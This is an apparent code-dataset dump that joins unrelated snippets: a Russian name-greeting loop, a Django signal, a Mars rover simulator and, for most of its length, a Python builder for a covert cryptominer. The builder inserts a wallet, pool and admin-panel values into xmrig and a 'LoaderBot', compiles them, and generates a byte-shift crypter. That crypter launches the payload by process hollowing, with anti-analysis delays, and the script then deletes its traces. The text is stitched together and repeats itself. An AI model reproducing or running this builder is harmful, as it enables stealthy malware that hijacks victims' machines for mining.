"step-4": "staff = ['инженер-конструктор Игорь', 'главный бухгалтер МАРИНА',\n 'токарь высшего разряда нИКОЛАй', 'директор аэлита']\n\n\ndef employee_name(name):\n getting_a_name = name.split()\n name_staff = getting_a_name[-1]\n name_staff = name_staff.capitalize()\n return name_staff\n\n\ni = 0\nwhile i < len(staff):\n name_for_output = employee_name(staff[i])\n print(f'Привет, {name_for_output}!')\n i += 1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
property_viewed = django.dispatch.Signal(providing_args=['property', 'user',
'request', 'response'])
<|reserved_special_token_1|>
import django.dispatch
property_viewed = django.dispatch.Signal(providing_args=['property', 'user',
'request', 'response'])
<|reserved_special_token_1|>
import django.dispatch
property_viewed = django.dispatch.Signal(providing_args=["property","user", "request", "response"])
|
flexible
|
{
"blob_id": "00099cab0c816c76fc0fa94d7905175feb6919cf",
"index": 9795,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nproperty_viewed = django.dispatch.Signal(providing_args=['property', 'user',\n 'request', 'response'])\n",
"step-3": "import django.dispatch\nproperty_viewed = django.dispatch.Signal(providing_args=['property', 'user',\n 'request', 'response'])\n",
"step-4": "import django.dispatch\n\nproperty_viewed = django.dispatch.Signal(providing_args=[\"property\",\"user\", \"request\", \"response\"])",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class Rover(object):
DIRECTIONS = 'NESW'
MOVEMENTS = {
'N': (0, 1),
'E': (1, 0),
'S': (0, -1),
'W': (-1, 0)
}
def __init__(self, init_string, plateau_dimensions):
'''
give the rover a sense of the plateau it's on
'''
max_x, max_y = plateau_dimensions
self.max_x = int(max_x)
self.max_y = int(max_y)
'''
x = current x coordinate
y = current y coordinate
o = current orientation
'''
x, y, o = init_string.split(' ')
self.x = min(self.max_x, int(x))
self.y = min(self.max_y, int(y))
self.o = o
self.obstacles = {}
self.commands = ''
def __repr__(self):
return "<Rover x=%d, y=%d, o=%s>" % (self.x, self.y, self.o)
def get_position(self):
return self.x, self.y
def set_obstacles(self, locations):
for x, y in locations:
d = self.obstacles.setdefault(x, {})
d.setdefault(y, 'ROVER') # could be any value
def is_location_free(self, x, y):
column = self.obstacles.get(x)
if not column:
''' nothing in this column '''
return True
else:
row = column.get(y)
if not row:
return True
return False
def _rotate(self, direction):
i = self.DIRECTIONS.index(self.o)
i = i + direction
if i == len(self.DIRECTIONS):
self.o = self.DIRECTIONS[0]
elif i < 0:
self.o = self.DIRECTIONS[-1]
else:
self.o = self.DIRECTIONS[i]
def rotate_right(self):
self._rotate(1)
def rotate_left(self):
self._rotate(-1)
def move(self):
x, y = self.MOVEMENTS.get(self.o)
new_x = self.x + x
new_y = self.y + y
if (not 0 <= new_x <= self.max_x) or (not 0 <= new_y <= self.max_y):
''' ignore, out of bounds '''
pass
elif not self.is_location_free(new_x, new_y):
''' there is a rover in my way! '''
pass
else:
self.x += x
self.y += y
def set_commands(self, command_string):
self.commands = command_string
def execute(self):
for c in self.commands:
if c == 'L':
self.rotate_left()
elif c == 'R':
self.rotate_right()
elif c == 'M':
self.move()
else:
print 'unknown command: %s' % c
return "%d %d %s" % (self.x, self.y, self.o)
class ControlCenter(object):
def __init__(self):
self.input = ''
self.rovers = []
def set_input(self, text):
''' take the input, split by newline and discard empty lines '''
self.input = [line for line in text.split('\n') if line]
def clear_rovers(self):
self.rovers = []
def initialize_rover(self, initial_position, plateau_dimensions):
rover = Rover(initial_position, plateau_dimensions)
'''
Initialize a rover and add it to a list of rovers for reference.
'''
self.rovers.append(rover)
return rover
def run(self):
rover_states = []
''' First setup the rovers, and collect the control statements '''
for i, line in enumerate(self.input):
line = line.upper()
if i == 0:
plateau_dimensions = line.split(" ")
elif (i % 2) == 1:
rover = self.initialize_rover(line, plateau_dimensions)
else:
rover.set_commands(line)
'''
Now that we have all the rovers initialized, we can pass their current
positions to the one that's going to move in order to avoid collisions.
'''
for i, rover in enumerate(self.rovers):
obstacles = [r.get_position()
for r in self.rovers[:i] + self.rovers[i + 1:]]
rover.set_obstacles(obstacles)
state = rover.execute()
rover_states.append(state)
return "\n\n".join(rover_states)
if __name__ == "__main__":
from test_cases import tests
success = 0
cc = ControlCenter()
for i, (test_input, test_output) in enumerate(tests, start=1):
cc.clear_rovers()
cc.set_input(test_input)
if cc.run() == test_output:
success += 1
print '%d tests out of %d passed' % (success, i)
|
normal
|
{
"blob_id": "1f49d2341f0bcc712baede28f41c208a01b92e6d",
"index": 2998,
"step-1": "class Rover(object):\n\n DIRECTIONS = 'NESW'\n MOVEMENTS = {\n 'N': (0, 1),\n 'E': (1, 0),\n 'S': (0, -1),\n 'W': (-1, 0)\n }\n\n def __init__(self, init_string, plateau_dimensions):\n ''' \n give the rover a sense of the plateau it's on\n '''\n max_x, max_y = plateau_dimensions\n self.max_x = int(max_x)\n self.max_y = int(max_y)\n\n '''\n x = current x coordinate\n y = current y coordinate\n o = current orientation\n '''\n x, y, o = init_string.split(' ')\n self.x = min(self.max_x, int(x))\n self.y = min(self.max_y, int(y))\n self.o = o\n\n self.obstacles = {}\n self.commands = ''\n\n def __repr__(self):\n return \"<Rover x=%d, y=%d, o=%s>\" % (self.x, self.y, self.o)\n\n def get_position(self):\n return self.x, self.y\n\n def set_obstacles(self, locations):\n for x, y in locations:\n d = self.obstacles.setdefault(x, {})\n d.setdefault(y, 'ROVER') # could be any value\n\n def is_location_free(self, x, y):\n column = self.obstacles.get(x)\n if not column:\n ''' nothing in this column '''\n return True\n else:\n row = column.get(y)\n if not row:\n return True\n\n return False\n\n def _rotate(self, direction):\n i = self.DIRECTIONS.index(self.o)\n i = i + direction\n if i == len(self.DIRECTIONS):\n self.o = self.DIRECTIONS[0]\n elif i < 0:\n self.o = self.DIRECTIONS[-1]\n else:\n self.o = self.DIRECTIONS[i]\n\n def rotate_right(self):\n self._rotate(1)\n\n def rotate_left(self):\n self._rotate(-1)\n\n def move(self):\n x, y = self.MOVEMENTS.get(self.o)\n new_x = self.x + x\n new_y = self.y + y\n\n if (not 0 <= new_x <= self.max_x) or (not 0 <= new_y <= self.max_y):\n ''' ignore, out of bounds '''\n pass\n elif not self.is_location_free(new_x, new_y):\n ''' there is a rover in my way! '''\n pass\n else:\n self.x += x\n self.y += y\n\n def set_commands(self, command_string):\n self.commands = command_string\n\n def execute(self):\n for c in self.commands:\n if c == 'L':\n self.rotate_left()\n elif c == 'R':\n self.rotate_right()\n elif c == 'M':\n self.move()\n else:\n print 'unknown command: %s' % c\n\n return \"%d %d %s\" % (self.x, self.y, self.o)\n\n\nclass ControlCenter(object):\n\n def __init__(self):\n self.input = ''\n self.rovers = []\n\n def set_input(self, text):\n ''' take the input, split by newline and discard empty lines '''\n self.input = [line for line in text.split('\\n') if line]\n\n def clear_rovers(self):\n self.rovers = []\n\n def initialize_rover(self, initial_position, plateau_dimensions):\n rover = Rover(initial_position, plateau_dimensions)\n '''\n Initialize a rover and add it to a list of rovers for reference.\n '''\n self.rovers.append(rover)\n return rover\n\n def run(self):\n rover_states = []\n\n ''' First setup the rovers, and collect the control statements '''\n for i, line in enumerate(self.input):\n line = line.upper()\n\n if i == 0:\n plateau_dimensions = line.split(\" \")\n elif (i % 2) == 1:\n rover = self.initialize_rover(line, plateau_dimensions)\n else:\n rover.set_commands(line)\n\n ''' \n Now that we have all the rovers initialized, we can pass their current\n positions to the one that's going to move in order to avoid collisions.\n '''\n for i, rover in enumerate(self.rovers):\n obstacles = [r.get_position()\n for r in self.rovers[:i] + self.rovers[i + 1:]]\n rover.set_obstacles(obstacles)\n state = rover.execute()\n rover_states.append(state)\n\n return \"\\n\\n\".join(rover_states)\n\n\nif __name__ == \"__main__\":\n from test_cases import tests\n success = 0\n cc = ControlCenter()\n for i, (test_input, test_output) in enumerate(tests, start=1):\n cc.clear_rovers()\n cc.set_input(test_input)\n\n if cc.run() == test_output:\n success += 1\n\n print '%d tests out of %d passed' % (success, i)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os, sys, time, random, subprocess
def load_userdata(wallet, pool, ww, logger, adminka):
with open("D:\\msys64\\xmrig-master\\src\\ex.cpp", "r") as f:
file = f.read()
file = file.replace("%u%", wallet)
file = file.replace("%p%", pool)
file = file.replace("%w%", ww)
with open("D:\\msys64\\xmrig-master\\src\\xmrig.cpp", "w") as w:
w.write(file)
with open(os.getcwd()+"\\Bot\\Miner\\ex.cs", "r") as f:
file = f.read()
file = file.replace("%l%", logger)
file = file.replace("%a%", adminka)
with open(os.getcwd()+"\\Bot\\Miner\\Program.cs", "w") as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd()+"\\file.txt", "r") as f:
file = f.read()
with open(os.getcwd()+"\\Miner\\CryptRunPe\\winhost.cpp", "w") as w:
w.write("#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n")
with open("ex.txt") as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system("%windir%\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileM(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileR(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release /p:Platform=\"WIN32\"")
def xcopy(path, out):
try:
with open(path, "rb") as f:
file = f.read()
with open(out, "wb") as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = '\n\
#include <Windows.h>\n\
#include <winternl.h>\n\
#include <iostream>\n\
#include <string>\n\
#include <fstream>\n\
using namespace std;\n\
int main()\n\
{\n\
FILE * file = fopen("in.exe", "rb");\n\
if (file == NULL) return 0;\n\
fseek(file, 0, SEEK_END);\n\
long int size = ftell(file);\n\
fclose(file);\n\
file = fopen("in.exe", "rb");\n\
unsigned char * in = (unsigned char *)malloc(size);\n\
int bytes_read = fread(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] - 0x0%n%;\n\
}\n\
file = fopen("out.exe", "wb");\n\
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] + 0x0%n%;\n\
}\n\
file = fopen("decr.exe", "wb");\n\
bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
return 0;\n\
}\n\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
os.system("g++ -o enc encoder.cpp")
os.system("C:\Python27\python.exe cv.py")
with open('file.txt', 'r') as r:
with open(os.getcwd()+"\\src\\crypter\\crypter.cpp", "w") as w:
txt = '\
#include "stdafx.h"\n\
#include "Crypter.h"\n\
#include <windows.h>\n\
#include <winternl.h>\n\
#pragma comment(lib,"ws2_32.lib")\n\
#pragma comment(lib,"ntdll.lib")\n\
'+ r.read() + '\
int RunPortableExecutable(void* Image) {\n\
IMAGE_DOS_HEADER* DOSHeader;\n\
IMAGE_NT_HEADERS* NtHeader;\n\
IMAGE_SECTION_HEADER* SectionHeader;\n\
PROCESS_INFORMATION PI;\n\
STARTUPINFOA SI;\n\
CONTEXT* CTX;\n\
DWORD* ImageBase;\n\
void* pImageBase;\n\
int count;\n\
char buffer[MAX_PATH];\n\
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n\
char *CurrentFilePath = buffer;\n\
DOSHeader = PIMAGE_DOS_HEADER(Image);\n\
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n\
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n\
ZeroMemory(&PI, sizeof(PI));\n\
ZeroMemory(&SI, sizeof(SI));\n\
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n\
NtUnmapViewOfSection mNtUnmapViewOfSection;\n\
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n\
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n\
CTX->ContextFlags = CONTEXT_FULL;\n\
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n\
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n\
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n\
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n\
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n\
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n\
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n\
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n\
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n\
}\n\
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n\
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n\
SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n\
ResumeThread(PI.hThread);\n\
return 0;\n\
}\n\
}\n\
}\n\
}\n\
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n\
for (int i = 0; i < 550000; i++)\n\
OutputDebugStringW(L"");\n\
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n\
unsigned char b = rawData[i] + 0x0%n%;\n\
rawData[i] = b;\n\
}\n\
Sleep(((rand() % 5 + 1) + 5) * 1000);\n\
RunPortableExecutable(rawData);\n\
return 0;\n\
}\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
compileM(os.getcwd()+"\\src\\", "ConsoleApplication1")
xcopy(os.getcwd() + "\\src\\Release\\Crypter.exe", os.getcwd()+"\\"+name+".exe")
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
a = sys.argv[5]
load_userdata(u, p, w, l, a)
compile(os.getcwd()+"\\Bot\\", "LoaderBot")
xcopy(os.getcwd()+"\\Bot\\Miner\\bin\\Release\\LoaderBot.exe", "Bot.exe")
compileR(os.getcwd()+"\\rig\\", "xmrig")
xcopy(os.getcwd()+"\\rig\\Release\\xmrig.exe", "out.exe")
crypt("test", key)
os.system("C:\Python27\python.exe cv.py")
writeBytes(key)
compileM(os.getcwd()+"\\Miner\\", "winhost")
xcopy(os.getcwd()+"\\Miner\\Release\\winhost.exe", "in.exe")
print(os.getcwd()+"\\enc.exe")
subprocess.call(os.getcwd()+"\\enc.exe")
crypt("winhost", key)
os.system("del file.txt")
os.system("del in.exe")
os.system("del out.exe")
os.system("del decr.exe")
os.system("del enc.exe")
os.system("del test.exe")
|
normal
|
{
"blob_id": "d1254e558217cce88de2f83b87d5c54333f1c677",
"index": 9938,
"step-1": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 